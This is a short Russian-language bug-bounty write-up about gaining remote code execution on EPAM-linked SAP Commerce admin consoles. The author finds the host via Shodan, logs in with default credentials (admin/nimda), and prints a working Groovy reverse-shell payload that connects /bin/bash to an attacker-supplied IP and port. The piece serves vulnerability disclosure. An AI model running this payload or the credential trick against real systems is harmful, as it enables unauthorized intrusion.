2 RCE в багбаунти программе EPAM
SHADOW:Group
Оригинал статьи на английском тут.
Когда я хантил по баунти-программе Epam, я зашел в shodan и ввел запрос “ssl:epam.com”. Там мне попался ip 40.117.**.***. Я использовал dirsearch для брута директорий и нашел эндпоинт http://40.117.**.***/hac/login/

“The hac extension is the default administration web application of SAP Commerce”.
Я погуглил дефолтные учетные данные и нашел их тут:
https://www.cloudnir.com/sap-commerce-cloud-consoles/hybris-administrative-console-hac/
Имя пользователя: admin
Пароль: nimda
И это сработало, я вошел в панель администратора.
Я изучил панель и заметил вкладку с консолью ==> http://40.117.**.***/hac/console/scripting/

Данная консоль поддерживает скриптовый язык Groovy, о котором вы можете узнать больше по данной ссылке - https://en.wikipedia.org/wiki/Apache_Groovy
Затем я использовал этот код, чтобы получить удаленное выполнение кода
String host="Your Ip Here";
int port=Your Port;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Вы можете найти больше пэйлоадов здесь https://coldfusionx.github.io/posts/Groovy_RCE/
После того, как я получил RCE, я снова пошел в Shodan и поискал другие IP-адреса, и нашел такое же приложение hac, о чем также сообщил программе Epam.
Видео с PoC доступно тут:
На этом все, спасибо за просмотр!
Подпишись на канал - @shadow_group_tg.